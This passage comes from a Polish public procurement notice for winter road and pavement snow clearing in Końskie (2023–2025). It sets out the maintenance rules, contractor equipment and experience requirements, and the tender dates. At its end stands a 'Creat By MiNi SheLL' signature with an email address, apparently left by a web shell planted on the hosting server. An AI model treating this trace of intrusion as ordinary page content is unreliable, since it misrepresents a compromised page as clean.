niewymagających prac zimowego utrzymania dróg, Zamawiający ma prawo zawiesić czynności związane z zimowym utrzymaniem i za ten okres nie przysługuje wynagrodzenie. Po sygnale o ponownym uruchomieniu akcji przez Zamawiającego, Wykonawca jest zobowiązany w ciągu 1 godzin osiągnąć pełną gotowość do pracy. W ramach umowy Zamawiający może wskazać konkretne zakresy rzeczowe, bez konieczności uruchamiania całości zimowego utrzymania.<br/>2.5	W przypadku nagłej zmiany warunków pogodowych Wykonawca sam podejmuje decyzję <br/>o rodzaju wprowadzenia akcji zimowego utrzymania, po powiadomieniu telefonicznym Zamawiającego.<br/>2.6	Wykonawca pokrywa pełną wysokość ewentualnych szkód na rzecz osób trzecich powstałych na skutek niewłaściwego wykonania prac. <br/>2.7	W okresie prowadzenia akcji zimowego utrzymania Wykonawca zapewnia:<br/>-	dyżurną służbę telefoniczną przez całą dobę.<br/>-	system łączności Wykonawcy ze sprzętem użytym w akcji.<br/>-	prowadzenie ewidencji i dokumentacji robót wykonywanych w czasie trwania akcji zimowej,<br/>-	urządzenia GPS do lokalizowania pojazdów biorących udział w akcji zimowego utrzymania dróg . <br/>3.	Zasady odbioru robót zimowego utrzymania dróg.<br/>Odbiorowi podlega odśnieżanie i zwalczanie śliskości zimowej. Odbioru dokonuje Koordynator wyznaczony przez Burmistrza Miasta i Gminy Końskie.<br/>W przypadku nie należytego wykonania zadań związanych z prowadzeniem akcji zimowej Wykonawca musi ponownie wykonać usługę zimowego utrzymania dróg bez wynagrodzenia za dany przedział czasowy.<br/>Obmiar robót będzie dokonywany w dwóch przedziałach czasowych: <br/>	I od godz. 300 do godz. 1500<br/>	II od godz. 1500 do godz. 300<br/>Jednostką obmiarową będzie 1 km utrzymanego odcinka drogi dziennie (w ciągu doby). <br/>W przypadku uruchomienia akcji w poszczególnym przedziale czasowym Wykonawca otrzyma <br/>w tym przedziale wynagrodzenie będące iloczynem ilości kilometrów oraz 50% w przypadku akcji czynnej ceny utrzymania 1km dziennie, 25% w przypadku akcji patrolowej, natomiast <br/>w przypadku, gdy akcja zimowa w danym przedziale czasowym nie zostanie uruchomiona wówczas Wykonawcy nie przysługuje wynagrodzenie za ten przedział czasowy. Zamawiający ma prawo zmniejszyć ilość jednostek obmiarowych po sprawdzeniu jakości wykonanej usługi.<br/>Uwaga do zadania nr 2 – Zimowe utrzymanie ulic na terenie miasta Końskie przy zastosowaniu solanki lub soli oraz odśnieżanie chodników w sezonach zimowych 2023-2025. Jednostka obmiarowa 1 godzina pracy miniciągnika (odśnieżanie chodników). <br/>4.	Termin przygotowania do prowadzenia akcji zimowego utrzymania dróg.<br/>Wykonawca gwarantuje gotowość przystąpienia do akcji zimowej w okresach <br/>15.10.2023r. do 30.04.2024r. – 198 dni<br/>15.10.2024 r. do 30.04.2025 r. – 197 dni <br/>5.	Wykaz dróg objętych zimowym utrzymaniem dróg zawierają załączniki nr 1 do zadań nr 1,2,3. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-10-15 do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia (zad. 1-3): Zimowe utrzymanie dróg położonych na terenie miasta i gminy Końskie .<br/>Ustalenia zawarte w specyfikacjach : D – 10.10.01b, D – 10.10.01c dotyczą wykonania prac związanych<br/> z odśnieżaniem i ze zwalczaniem śliskości dróg gminnych i ulic miejskich.<br/>Zadanie Nr 1 – Zimowe utrzymanie dróg na terenie gminy przy zastosowaniu mieszanki piasku <br/>i soli w sezonach zimowych 2023-2025,<br/>Zadanie Nr 2 – Zimowe utrzymanie ulic na terenie miasta Końskie przy zastosowaniu solanki lub soli oraz odśnieżanie chodników w sezonach zimowych 2023-2025,<br/>Zadanie Nr 3 – Zimowe utrzymanie ulic na terenie miasta Końskie przy zastosowaniu mieszanki piasku <br/>i soli w sezonach zimowych 2023-2025,<br/>Wykonawca zapewnia własny sprzęt (wg warunków zamówienia), materiały do likwidacji śliskości (piasek, sól, solanka), osobę bądź osoby do pełnienia dyżuru, urządzenia GPS do lokalizowania sprzętu biorącego udział w akcji zimowej oraz miejsce do magazynowania materiałów <br/>i sprzętu, przez cały okres umowy.<br/>1.	Rodzaje akcji zimowego utrzymania.<br/>1.1	Akcja czynna.<br/>Akcja czynna polega na bieżącym usuwaniu z pasów ruchu gromadzącego się w czasie opadów śniegu, tak aby utrzymać drogę w określonym standardzie i bieżącym usuwaniu śliskości poprzez posypywanie materiałem uszorstniającym lub środkami chemicznymi.<br/>Za piaskarką lub solarką ma pozostać widoczny na całej szerokości jezdni ślad rozsypanych środków uszorstniających. Nadmiar śniegu Wykonawca wywozi w miejsce wskazane przez zamawiającego.<br/>1.2	Akcja patrolowa.<br/>Akcja patrolowa polega na patrolowaniu przydzielonych odcinków dróg i w razie konieczności ich interwencyjnym odśnieżaniu i usuwaniu śliskości poprzez posypywanie materiałem uszorstniającym lub środkami chemicznymi – przez pojęcie interwencyjne odśnieżanie i usuwanie śliskości należy rozumieć wykonanie tych robót na odcinku do 30% z zakresu prowadzenia akcji czynnej.<br/>Akcja czynna lub patrolowa będzie rozpatrywana w dwóch przedziałach czasowych:<br/>-	I od godz. 300 do godz. 1500<br/>-	II od godz. 1500 do godz. 300 <br/>a płatność za dany przedział czasowy będzie wynosić w przypadku akcji czynnej 50% <br/>a w przypadku akcji patrolowej 25% stawki za zimowe utrzymanie 1 km drogi dziennie. <br/>2.	Zasady prowadzenia akcji zimowego utrzymania.<br/>2.1	Osobą decydującą o rodzaju i terminie prowadzonej akcji zimowego utrzymania dróg będzie Koordynator wyznaczony przez Burmistrza Miasta i Gminy Końskie i wymieniony <br/>w umowie o utrzymanie zimowe dróg. <br/>2.2	Wykonawca gwarantuje pełną gotowość do prowadzenia akcji zimowego utrzymania dróg <br/>w ciągu 1 godziny od otrzymania sygnału od Zamawiającego. <br/>2.3	W okresie trwania akcji zimowego utrzymania dróg Wykonawca podejmuje samodzielnie decyzje w zakresie rodzaju i ilości użytego sprzętu.<br/>2.4	W przypadku ustabilizowanych warunków pogodowych niewymagających prac zimowego utrzymania dróg, Zamawiający ma prawo zawiesić czynności związane z zimowym utrzymaniem i za ten okres nie przysługuje wynagrodzenie. Po sygnale o ponownym uruchomieniu akcji przez Zamawiającego, Wykonawca jest zobowiązany w ciągu 1 godzin osiągnąć pełną gotowość do pracy. W ramach umowy Zamawiający może wskazać konkretne zakresy rzeczowe, bez konieczności uruchamiania całości zimowego utrzymania.<br/>2.5	W przypadku nagłej zmiany warunków pogodowych Wykonawca sam podejmuje decyzję <br/>o rodzaju wprowadzenia akcji zimowego utrzymania, po powiadomieniu telefonicznym Zamawiającego.<br/>2.6	Wykonawca pokrywa pełną wysokość ewentualnych szkód na rzecz osób trzecich powstałych na skutek niewłaściwego wykonania prac. <br/>2.7	W okresie prowadzenia akcji zimowego utrzymania Wykonawca zapewnia:<br/>-	dyżurną służbę telefoniczną przez całą dobę.<br/>-	system łączności Wykonawcy ze sprzętem użytym w akcji.<br/>-	prowadzenie ewidencji i dokumentacji robót wykonywanych w czasie trwania akcji zimowej,<br/>-	urządzenia GPS do lokalizowania pojazdów biorących udział w akcji zimowego utrzymania dróg . <br/>3.	Zasady odbioru robót zimowego utrzymania dróg.<br/>Odbiorowi podlega odśnieżanie i zwalczanie śliskości zimowej. Odbioru dokonuje Koordynator wyznaczony przez Burmistrza Miasta i Gminy Końskie.<br/>W przypadku nie należytego wykonania zadań związanych z prowadzeniem akcji zimowej Wykonawca musi ponownie wykonać usługę zimowego utrzymania dróg bez wynagrodzenia za dany przedział czasowy.<br/>Obmiar robót będzie dokonywany w dwóch przedziałach czasowych: <br/>	I od godz. 300 do godz. 1500<br/>	II od godz. 1500 do godz. 300<br/>Jednostką obmiarową będzie 1 km utrzymanego odcinka drogi dziennie (w ciągu doby). <br/>W przypadku uruchomienia akcji w poszczególnym przedziale czasowym Wykonawca otrzyma <br/>w tym przedziale wynagrodzenie będące iloczynem ilości kilometrów oraz 50% w przypadku akcji czynnej ceny utrzymania 1km dziennie, 25% w przypadku akcji patrolowej, natomiast <br/>w przypadku, gdy akcja zimowa w danym przedziale czasowym nie zostanie uruchomiona wówczas Wykonawcy nie przysługuje wynagrodzenie za ten przedział czasowy. Zamawiający ma prawo zmniejszyć ilość jednostek obmiarowych po sprawdzeniu jakości wykonanej usługi.<br/>Uwaga do zadania nr 2 – Zimowe utrzymanie ulic na terenie miasta Końskie przy zastosowaniu solanki lub soli oraz odśnieżanie chodników w sezonach zimowych 2023-2025. Jednostka obmiarowa 1 godzina pracy miniciągnika (odśnieżanie chodników). <br/>4.	Termin przygotowania do prowadzenia akcji zimowego utrzymania dróg.<br/>Wykonawca gwarantuje gotowość przystąpienia do akcji zimowej w okresach <br/>15.10.2023r. do 30.04.2024r. – 198 dni<br/>15.10.2024 r. do 30.04.2025 r. – 197 dni <br/>5.	Wykaz dróg objętych zimowym utrzymaniem dróg zawierają załączniki nr 1 do zadań nr 1,2,3. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-10-15 do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia -Zadanie Nr 4 – Zimowe utrzymanie dróg wewnętrznych położonych na terenie miasta i gminy Końskie (odśnieżanie ciągnikiem) w sezonach zimowych 2023-2025,- odśnieżanie dróg wewnętrznych położonych na terenie miasta i gminy Końskie ciągnikiem <br/>z pługiem średnim, wykaz dróg zał. 4. Jednostka obmiarowa 1 godzina pracy ciągnika. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-10-15 do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zdolność techniczna lub zawodowa:	<br/>Opis spełniania warunku:<br/>Zamawiający uzna ww.warunek zostanie spełniony, jeśli wykonawca wykaże, że: <br/>a)w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres <br/>prowadzenia działalności jest krótszy – w tym okresie), zrealizował należycie <br/>Zadanie nr 1 - Co najmniej jedną usługę polegającą na zimowym utrzymaniu dróg przy zastosowaniu mieszanki piasku i soli o wartości min 70 tys. zł (brutto),<br/>Zadanie nr 2 - Co najmniej jedną usługę polegająca na zimowym utrzymaniu dróg przy zastosowaniu solanki lub soli o wartości min 60 tys. zł. (brutto),<br/>Zadanie nr 3 - Co najmniej jedną usługę polegającą na zimowym utrzymaniu dróg przy zastosowaniu solanki, soli lub mieszanki piasku i soli o wartości min 60 tys. zł. (brutto),<br/><br/>b) Zamawiający uzna ww.warunek zostanie spełniony, jeżeli wykonawca wykaże że dysponuje:<br/>Zadanie nr 1 – co najmniej: 2 pługopiaskarki na samochodach ciężarowych z pługami min. średnimi <br/>z dociskiem, ładowarka, samochód do wywozu śniegu, <br/>Zadanie nr 2 - pługosolarka na samochodzie ciężarowym (pług średni), ładowarka, samochód do wywozu śniegu, miniciągnik do odśnieżania chodników, <br/>Zadanie nr 3 – co najmniej: 2 pługopiaskarki (pługi średnie na samochodach ciężarowych), 2 ciągniki o mocy min 95 KM z pługiem średnim strzałkowym i posypywarką , ładowarka, samochód do wywozu śniegu, lub pługopiaskarka na samochodzie ciężarowym z pługiem średnim, 3 ciągniki z pługami średnimi strzałkowymi<br/> i 2 posypywarkami, <br/>Zadanie nr 4 – ciągnik o mocy min 95 KM z pługiem średnim .<br/> <br/>UWAGA: W przypadku gdy Wykonawca złoży oferty częściowe na większą ilość zadań, winien wykazać się dostępem do sumy sprzętu wymaganego dla poszczególnych zadań. Jeżeli Wykonawca składa ofertę na więcej niż jedną część, to Zamawiający nie dopuszcza wykazania tej samej jednostki sprzętowej w więcej niż jednej części zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>a) wykazu narzędzi, wyposażenia i urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami. Wzór wykazu stanowi- załącznik nr 6 do SWZ.( zad. 1-4)<br/>b) wykazu usług wykonanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania <br/>i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów –oświadczenie wykonawcy. Jeżeli Wykonawca powołuje się na doświadczenie <br/>w realizacji usług, wykonywanych wspólnie z innymi Wykonawcami, wykaz ma dotyczyć usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył. Wzór wykazu stanowi<br/>załącznik nr 5 do SWZ.(zad. 1-3)</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć:<br/>1)	Formularz ofertowy stanowiący załącznik nr 1 do SWZ<br/>2)	Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>3)	Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia – dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>4)	Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania i spełnianiu warunków udziału w postępowaniu– wzór oświadczenia stanowi załącznik nr 2 do SWZ. <br/>5)	W przypadku wykonawców wspólnie składających ofertę - Oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy [art. 117 ust. 4 ustawy pzp] - załącznik nr 4 do SWZ.<br/>6)	W przypadku Wykonawcy, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby - zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów,<br/>7)	W przypadku Wykonawcy, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby – Oświadczenie podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu z postępowania i spełnianiu warunków udziału <br/>w postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby wykonawcy – wzór oświadczenia stanowi załącznik nr 3 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> W/w zostało określone w projektowanych postanowieniach umowy Dział II SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-01 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pomocą Platformy e-Zamówienia dostępnej pod adresem: https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-01 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-09-30</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com